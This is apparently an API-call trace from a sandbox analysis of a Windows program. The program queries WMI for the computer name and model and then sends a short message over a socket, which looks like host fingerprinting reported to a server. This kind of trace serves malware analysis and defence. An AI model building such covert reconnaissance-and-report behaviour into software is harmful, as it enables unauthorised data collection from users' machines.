	[0262.429] CoGetContextToken (in: pToken=0x5dee5b8 | out: pToken=0x5dee5b8) returned 0x0
	[0262.429] CoGetContextToken (in: pToken=0x5dee578 | out: pToken=0x5dee578) returned 0x0
	[0262.429] WbemLocator:IUnknown:AddRef (This=0x7f930c) returned 0x2
	[0262.429] WbemLocator:IUnknown:QueryInterface (in: This=0x7f930c, riid=0x5dee5f4*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x5dee5f0 | out: ppvObject=0x5dee5f0*=0x6362114) returned 0x0
	[0262.429] WbemLocator:IUnknown:Release (This=0x7f930c) returned 0x2
	[0262.429] IUnknown:AddRef (This=0x6362114) returned 0x3
	[0262.430] IEnumWbemClassObject:Reset (This=0x6362114) returned 0x0
	[0262.431] IUnknown:Release (This=0x6362114) returned 0x2
	[0262.432] CoGetContextToken (in: pToken=0x5dee4ac | out: pToken=0x5dee4ac) returned 0x0
	[0262.432] IUnknown:AddRef (This=0x6362114) returned 0x3
	[0262.432] IEnumWbemClassObject:Next (in: This=0x6362114, lTimeout=-1, uCount=0x1, apObjects=0x769e88, puReturned=0x315aa88 | out: apObjects=0x769e88*=0x6362150, puReturned=0x315aa88*=0x1) returned 0x0
	[0262.448] IUnknown:QueryInterface (in: This=0x6362150, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dedab8 | out: ppvObject=0x5dedab8*=0x6362150) returned 0x0
	[0262.448] IUnknown:QueryInterface (in: This=0x6362150, riid=0x74774204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5deda74 | out: ppvObject=0x5deda74*=0x0) returned 0x80004002
	[0262.448] IUnknown:QueryInterface (in: This=0x6362150, riid=0x746a0b9c*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5ded968 | out: ppvObject=0x5ded968*=0x0) returned 0x80004002
	[0262.449] IUnknown:AddRef (This=0x6362150) returned 0x3
	[0262.449] CoGetContextToken (in: pToken=0x5ded900 | out: pToken=0x5ded900) returned 0x0
	[0262.449] IUnknown:QueryInterface (in: This=0x6362150, riid=0x746523cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5ded8e8 | out: ppvObject=0x5ded8e8*=0x6362154) returned 0x0
	[0262.449] IMarshal:GetUnmarshalClass (in: This=0x6362154, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x5ded8f0 | out: pCid=0x5ded8f0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0
	[0262.449] IUnknown:Release (This=0x6362154) returned 0x3
	[0262.449] CoGetContextToken (in: pToken=0x5ded8f8 | out: pToken=0x5ded8f8) returned 0x0
	[0262.449] IUnknown:AddRef (This=0x6362150) returned 0x4
	[0262.449] IUnknown:QueryInterface (in: This=0x6362150, riid=0x746a767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5ded96c | out: ppvObject=0x5ded96c*=0x0) returned 0x80004002
	[0262.450] IUnknown:Release (This=0x6362150) returned 0x3
	[0262.450] IUnknown:Release (This=0x6362150) returned 0x2
	[0262.450] CoGetContextToken (in: pToken=0x5dedd58 | out: pToken=0x5dedd58) returned 0x0
	[0262.450] CoGetContextToken (in: pToken=0x5dedd18 | out: pToken=0x5dedd18) returned 0x0
	[0262.450] IUnknown:AddRef (This=0x6362150) returned 0x3
	[0262.450] IUnknown:QueryInterface (in: This=0x6362150, riid=0x5dedd94*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x5dedd90 | out: ppvObject=0x5dedd90*=0x6362150) returned 0x0
	[0262.450] IUnknown:Release (This=0x6362150) returned 0x3
	[0262.450] IUnknown:Release (This=0x6362150) returned 0x2
	[0262.450] IUnknown:Release (This=0x6362150) returned 0x1
	[0262.451] IUnknown:Release (This=0x6362114) returned 0x2
	[0262.451] CoGetContextToken (in: pToken=0x5dee63c | out: pToken=0x5dee63c) returned 0x0
	[0262.451] IUnknown:AddRef (This=0x6362150) returned 0x2
	[0262.451] IWbemClassObject:Get (in: This=0x6362150, wszName="__GENUS", lFlags=0, pVal=0x5dee6b8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x5dee76c*=0, plFlavor=0x5dee768*=0 | out: pVal=0x5dee6b8*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x5dee76c*=3, plFlavor=0x5dee768*=64) returned 0x0
	[0262.451] IWbemClassObject:Get (in: This=0x6362150, wszName="__PATH", lFlags=0, pVal=0x5dee698*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x5dee750*=0, plFlavor=0x5dee74c*=0 | out: pVal=0x5dee698*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_ComputerSystem.Name=\"XDUWTFONO\"", varVal2=0x0), pType=0x5dee750*=8, plFlavor=0x5dee74c*=64) returned 0x0
	[0262.451] SysStringLen (param_1="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_ComputerSystem.Name=\"XDUWTFONO\"") returned 0x3c
	[0262.451] CoGetObjectContext (in: riid=0x2cbad00*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x5dee6f0 | out: ppv=0x5dee6f0*=0x718dec) returned 0x0
	[0262.452] IComThreadingInfo:GetCurrentApartmentType (in: This=0x718dec, pAptType=0x5dee6e8 | out: pAptType=0x5dee6e8*=1) returned 0x0
	[0262.452] IUnknown:QueryInterface (in: This=0x718dec, riid=0x2cbace8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x5dee6ec | out: ppvObject=0x5dee6ec*=0x0) returned 0x80004002
	[0262.452] IUnknown:Release (This=0x718dec) returned 0x1
	[0262.452] CoGetClassObject (in: rclsid=0x7d79e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x746da3b0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x5dee208 | out: ppv=0x5dee208*=0x635dee8) returned 0x0
	[0262.452] WbemDefPath:IUnknown:QueryInterface (in: This=0x635dee8, riid=0x747c7ecc*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5dee038 | out: ppvObject=0x5dee038*=0x0) returned 0x80004002
	[0262.453] WbemDefPath:IClassFactory:CreateInstance (in: This=0x635dee8, pUnkOuter=0x0, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dee070 | out: ppvObject=0x5dee070*=0x6361ee8) returned 0x0
	[0262.453] WbemDefPath:IUnknown:QueryInterface (in: This=0x6361ee8, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dede14 | out: ppvObject=0x5dede14*=0x6361ee8) returned 0x0
	[0262.453] WbemDefPath:IUnknown:QueryInterface (in: This=0x6361ee8, riid=0x74774204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5deddd0 | out: ppvObject=0x5deddd0*=0x0) returned 0x80004002
	[0262.453] WbemDefPath:IUnknown:AddRef (This=0x6361ee8) returned 0x3
	[0262.453] CoGetContextToken (in: pToken=0x5dedc5c | out: pToken=0x5dedc5c) returned 0x0
	[0262.454] WbemDefPath:IUnknown:QueryInterface (in: This=0x6361ee8, riid=0x746523cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dedc44 | out: ppvObject=0x5dedc44*=0x639a0d8) returned 0x0
	[0262.454] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x639a0d8, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x5dedc4c | out: pCid=0x5dedc4c*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0262.454] WbemDefPath:IUnknown:Release (This=0x639a0d8) returned 0x3
	[0262.454] CoGetContextToken (in: pToken=0x5dedc54 | out: pToken=0x5dedc54) returned 0x0
	[0262.454] WbemDefPath:IUnknown:AddRef (This=0x6361ee8) returned 0x4
	[0262.454] WbemDefPath:IUnknown:QueryInterface (in: This=0x6361ee8, riid=0x746a767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dedcc8 | out: ppvObject=0x5dedcc8*=0x0) returned 0x80004002
	[0262.454] WbemDefPath:IUnknown:Release (This=0x6361ee8) returned 0x3
	[0262.454] WbemDefPath:IUnknown:Release (This=0x6361ee8) returned 0x2
	[0262.455] WbemDefPath:IUnknown:Release (This=0x635dee8) returned 0x0
	[0262.455] WbemDefPath:IUnknown:Release (This=0x6361ee8) returned 0x1
	[0262.455] CoGetContextToken (in: pToken=0x5dee504 | out: pToken=0x5dee504) returned 0x0
	[0262.455] CoGetContextToken (in: pToken=0x5dee4c4 | out: pToken=0x5dee4c4) returned 0x0
	[0262.455] WbemDefPath:IUnknown:AddRef (This=0x6361ee8) returned 0x2
	[0262.455] WbemDefPath:IUnknown:QueryInterface (in: This=0x6361ee8, riid=0x5dee540*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x5dee53c | out: ppvObject=0x5dee53c*=0x6361ee8) returned 0x0
	[0262.455] WbemDefPath:IUnknown:Release (This=0x6361ee8) returned 0x2
	[0262.455] WbemDefPath:IUnknown:Release (This=0x6361ee8) returned 0x1
	[0262.456] CoGetContextToken (in: pToken=0x5dee584 | out: pToken=0x5dee584) returned 0x0
	[0262.456] CoGetContextToken (in: pToken=0x5dee544 | out: pToken=0x5dee544) returned 0x0
	[0262.456] WbemDefPath:IUnknown:AddRef (This=0x6361ee8) returned 0x2
	[0262.456] WbemDefPath:IUnknown:QueryInterface (in: This=0x6361ee8, riid=0x5dee5c0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x5dee5bc | out: ppvObject=0x5dee5bc*=0x6361ee8) returned 0x0
	[0262.456] WbemDefPath:IUnknown:Release (This=0x6361ee8) returned 0x2
	[0262.456] WbemDefPath:IUnknown:AddRef (This=0x6361ee8) returned 0x3
	[0262.456] WbemDefPath:IWbemPath:SetText (This=0x6361ee8, uMode=0x4, pszPath="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_ComputerSystem.Name=\"XDUWTFONO\"") returned 0x0
	[0262.456] WbemDefPath:IUnknown:Release (This=0x6361ee8) returned 0x2
	[0262.456] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x635de40, puCount=0x5dee724 | out: puCount=0x5dee724*=0x2) returned 0x0
	[0262.456] WbemDefPath:IWbemPath:GetText (in: This=0x635de40, lFlags=4, puBuffLength=0x5dee720*=0x0, pszText=0x0 | out: puBuffLength=0x5dee720*=0x17, pszText=0x0) returned 0x0
	[0262.456] WbemDefPath:IWbemPath:GetText (in: This=0x635de40, lFlags=4, puBuffLength=0x5dee720*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5dee720*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0262.457] CoGetContextToken (in: pToken=0x5dee4ac | out: pToken=0x5dee4ac) returned 0x0
	[0262.457] IUnknown:AddRef (This=0x6362114) returned 0x3
	[0262.457] IEnumWbemClassObject:Next (in: This=0x6362114, lTimeout=-1, uCount=0x1, apObjects=0x769e88, puReturned=0x315aa88 | out: apObjects=0x769e88*=0x0, puReturned=0x315aa88*=0x0) returned 0x1
	[0262.460] IUnknown:Release (This=0x6362114) returned 0x2
	[0262.460] CoGetContextToken (in: pToken=0x5dee5f4 | out: pToken=0x5dee5f4) returned 0x0
	[0262.460] WbemLocator:IUnknown:Release (This=0x7f930c) returned 0x1
	[0262.460] IUnknown:Release (This=0x6362114) returned 0x0
	[0262.470] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x635de40, puCount=0x5dee798 | out: puCount=0x5dee798*=0x2) returned 0x0
	[0262.470] WbemDefPath:IWbemPath:GetText (in: This=0x635de40, lFlags=4, puBuffLength=0x5dee794*=0x0, pszText=0x0 | out: puBuffLength=0x5dee794*=0x17, pszText=0x0) returned 0x0
	[0262.470] WbemDefPath:IWbemPath:GetText (in: This=0x635de40, lFlags=4, puBuffLength=0x5dee794*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5dee794*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0262.470] IWbemClassObject:Get (in: This=0x6362150, wszName="__NAMESPACE", lFlags=0, pVal=0x5dee754*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x315b8a0*=0, plFlavor=0x315b8a4*=0 | out: pVal=0x5dee754*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\cimv2", varVal2=0x0), pType=0x315b8a0*=8, plFlavor=0x315b8a4*=64) returned 0x0
	[0262.470] SysStringLen (param_1="ROOT\\cimv2") returned 0xa
	[0262.470] IWbemClassObject:Get (in: This=0x6362150, wszName="__NAMESPACE", lFlags=0, pVal=0x5dee758*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x315b8a0*=8, plFlavor=0x315b8a4*=64 | out: pVal=0x5dee758*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\cimv2", varVal2=0x0), pType=0x315b8a0*=8, plFlavor=0x315b8a4*=64) returned 0x0
	[0262.470] SysStringLen (param_1="ROOT\\cimv2") returned 0xa
	[0262.470] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x635de40, puCount=0x5dee798 | out: puCount=0x5dee798*=0x2) returned 0x0
	[0262.470] WbemDefPath:IWbemPath:GetText (in: This=0x635de40, lFlags=4, puBuffLength=0x5dee794*=0x0, pszText=0x0 | out: puBuffLength=0x5dee794*=0x17, pszText=0x0) returned 0x0
	[0262.471] WbemDefPath:IWbemPath:GetText (in: This=0x635de40, lFlags=4, puBuffLength=0x5dee794*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5dee794*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0262.471] IWbemClassObject:Get (in: This=0x6362150, wszName="__CLASS", lFlags=0, pVal=0x5dee754*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x315b958*=0, plFlavor=0x315b95c*=0 | out: pVal=0x5dee754*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ComputerSystem", varVal2=0x0), pType=0x315b958*=8, plFlavor=0x315b95c*=64) returned 0x0
	[0262.471] SysStringLen (param_1="Win32_ComputerSystem") returned 0x14
	[0262.471] IWbemClassObject:Get (in: This=0x6362150, wszName="__CLASS", lFlags=0, pVal=0x5dee758*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x315b958*=8, plFlavor=0x315b95c*=64 | out: pVal=0x5dee758*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ComputerSystem", varVal2=0x0), pType=0x315b958*=8, plFlavor=0x315b95c*=64) returned 0x0
	[0262.471] SysStringLen (param_1="Win32_ComputerSystem") returned 0x14
	[0262.471] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x635de40, puCount=0x5dee788 | out: puCount=0x5dee788*=0x2) returned 0x0
	[0262.471] WbemDefPath:IWbemPath:GetText (in: This=0x635de40, lFlags=4, puBuffLength=0x5dee784*=0x0, pszText=0x0 | out: puBuffLength=0x5dee784*=0x17, pszText=0x0) returned 0x0
	[0262.471] WbemDefPath:IWbemPath:GetText (in: This=0x635de40, lFlags=4, puBuffLength=0x5dee784*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5dee784*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0262.471] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x635de40, puCount=0x5dee788 | out: puCount=0x5dee788*=0x2) returned 0x0
	[0262.471] WbemDefPath:IWbemPath:GetText (in: This=0x635de40, lFlags=4, puBuffLength=0x5dee784*=0x0, pszText=0x0 | out: puBuffLength=0x5dee784*=0x17, pszText=0x0) returned 0x0
	[0262.472] WbemDefPath:IWbemPath:GetText (in: This=0x635de40, lFlags=4, puBuffLength=0x5dee784*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5dee784*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0262.472] IWbemClassObject:GetNames (in: This=0x6362150, wszQualifierName=0x0, lFlags=48, pQualifierVal=0x5dee74c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pNames=0x5dee718 | out: pNames=0x5dee718*="\x01ƀ\x04") returned 0x0
	[0262.472] SafeArrayGetDim (psa=0x7f84a8) returned 0x1
	[0262.472] SafeArrayGetDim (psa=0x7f84a8) returned 0x1
	[0262.472] SafeArrayGetLBound (in: psa=0x7f84a8, nDim=0x1, plLbound=0x5dee314 | out: plLbound=0x5dee314) returned 0x0
	[0262.472] IWbemClassObject:Get (in: This=0x6362150, wszName="__GENUS", lFlags=0, pVal=0x5dee744*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x315c4b0*=0, plFlavor=0x315c4b4*=0 | out: pVal=0x5dee744*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x315c4b0*=3, plFlavor=0x315c4b4*=64) returned 0x0
	[0262.473] IWbemClassObject:Get (in: This=0x6362150, wszName="__CLASS", lFlags=0, pVal=0x5dee744*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x315c4e4*=0, plFlavor=0x315c4e8*=0 | out: pVal=0x5dee744*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ComputerSystem", varVal2=0x0), pType=0x315c4e4*=8, plFlavor=0x315c4e8*=64) returned 0x0
	[0262.473] SysStringLen (param_1="Win32_ComputerSystem") returned 0x14
	[0262.473] IWbemClassObject:Get (in: This=0x6362150, wszName="__SUPERCLASS", lFlags=0, pVal=0x5dee744*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x315c548*=0, plFlavor=0x315c54c*=0 | out: pVal=0x5dee744*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x315c548*=8, plFlavor=0x315c54c*=64) returned 0x0
	[0262.473] IWbemClassObject:Get (in: This=0x6362150, wszName="__DYNASTY", lFlags=0, pVal=0x5dee744*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x315c570*=0, plFlavor=0x315c574*=0 | out: pVal=0x5dee744*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ComputerSystem", varVal2=0x0), pType=0x315c570*=8, plFlavor=0x315c574*=64) returned 0x0
	[0262.473] SysStringLen (param_1="Win32_ComputerSystem") returned 0x14
	[0262.473] IWbemClassObject:Get (in: This=0x6362150, wszName="__RELPATH", lFlags=0, pVal=0x5dee744*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x315c5d4*=0, plFlavor=0x315c5d8*=0 | out: pVal=0x5dee744*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ComputerSystem.Name=\"XDUWTFONO\"", varVal2=0x0), pType=0x315c5d4*=8, plFlavor=0x315c5d8*=64) returned 0x0
	[0262.473] SysStringLen (param_1="Win32_ComputerSystem.Name=\"XDUWTFONO\"") returned 0x25
	[0262.474] IWbemClassObject:Get (in: This=0x6362150, wszName="__PROPERTY_COUNT", lFlags=0, pVal=0x5dee744*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x315c658*=0, plFlavor=0x315c65c*=0 | out: pVal=0x5dee744*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3a, varVal2=0x0), pType=0x315c658*=3, plFlavor=0x315c65c*=64) returned 0x0
	[0262.474] IWbemClassObject:Get (in: This=0x6362150, wszName="__DERIVATION", lFlags=0, pVal=0x5dee744*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x315c68c*=0, plFlavor=0x315c690*=0 | out: pVal=0x5dee744*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x7f84a8*(cDims=0x1, fFeatures=0x180, cbElements=0x4, cLocks=0x0, pvData=0x639a118, rgsabound=((cElements=0x0, lLbound=0))), varVal2=0x0), pType=0x315c68c*=8200, plFlavor=0x315c690*=64) returned 0x0
	[0262.474] IWbemClassObject:Get (in: This=0x6362150, wszName="__SERVER", lFlags=0, pVal=0x5dee744*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x315c6c4*=0, plFlavor=0x315c6c8*=0 | out: pVal=0x5dee744*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="XDUWTFONO", varVal2=0x0), pType=0x315c6c4*=8, plFlavor=0x315c6c8*=64) returned 0x0
	[0262.474] SysStringLen (param_1="XDUWTFONO") returned 0x9
	[0262.474] IWbemClassObject:Get (in: This=0x6362150, wszName="__NAMESPACE", lFlags=0, pVal=0x5dee744*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x315c710*=0, plFlavor=0x315c714*=0 | out: pVal=0x5dee744*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\cimv2", varVal2=0x0), pType=0x315c710*=8, plFlavor=0x315c714*=64) returned 0x0
	[0262.475] SysStringLen (param_1="ROOT\\cimv2") returned 0xa
	[0262.475] IWbemClassObject:Get (in: This=0x6362150, wszName="__PATH", lFlags=0, pVal=0x5dee744*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x315c760*=0, plFlavor=0x315c764*=0 | out: pVal=0x5dee744*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_ComputerSystem.Name=\"XDUWTFONO\"", varVal2=0x0), pType=0x315c760*=8, plFlavor=0x315c764*=64) returned 0x0
	[0262.475] SysStringLen (param_1="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_ComputerSystem.Name=\"XDUWTFONO\"") returned 0x3c
	[0262.475] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x635de40, puCount=0x5dee7c4 | out: puCount=0x5dee7c4*=0x2) returned 0x0
	[0262.475] WbemDefPath:IWbemPath:GetText (in: This=0x635de40, lFlags=4, puBuffLength=0x5dee7c0*=0x0, pszText=0x0 | out: puBuffLength=0x5dee7c0*=0x17, pszText=0x0) returned 0x0
	[0262.475] WbemDefPath:IWbemPath:GetText (in: This=0x635de40, lFlags=4, puBuffLength=0x5dee7c0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5dee7c0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0262.475] IWbemClassObject:Get (in: This=0x6362150, wszName="Model", lFlags=0, pVal=0x5dee780*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x315c864*=0, plFlavor=0x315c868*=0 | out: pVal=0x5dee780*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="M5X0JE", varVal2=0x0), pType=0x315c864*=8, plFlavor=0x315c868*=32) returned 0x0
	[0262.475] SysStringLen (param_1="M5X0JE") returned 0x6
	[0262.475] IWbemClassObject:Get (in: This=0x6362150, wszName="Model", lFlags=0, pVal=0x5dee838*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x315c864*=8, plFlavor=0x315c868*=32 | out: pVal=0x5dee838*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="M5X0JE", varVal2=0x0), pType=0x315c864*=8, plFlavor=0x315c868*=32) returned 0x0
	[0262.475] SysStringLen (param_1="M5X0JE") returned 0x6
	[0262.476] send (s=0x420, buf=0x315d758*, len=26, flags=0) returned 26
	[0262.476] GetLastError () returned 0x0
	[0262.476] recv (in: s=0x420, buf=0x310c8f8, len=502, flags=0 | out: buf=0x310c8f8*) returned 136
	[0263.216] GetLastError () returned 0x0
	[0263.218] VirtualQuery (in: lpAddress=0x5dedb98, lpBuffer=0x5deeb98, dwLength=0x1c | out: lpBuffer=0x5deeb98*(BaseAddress=0x5ded000, AllocationBase=0x5460000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0263.219] CoGetObjectContext (in: riid=0x2cbad00*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x5dee70c | out: ppv=0x5dee70c*=0x718dec) returned 0x0
	[0263.219] IComThreadingInfo:GetCurrentApartmentType (in: This=0x718dec, pAptType=0x5dee704 | out: pAptType=0x5dee704*=1) returned 0x0
	[0263.219] IUnknown:QueryInterface (in: This=0x718dec, riid=0x2cbace8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x5dee708 | out: ppvObject=0x5dee708*=0x0) returned 0x80004002
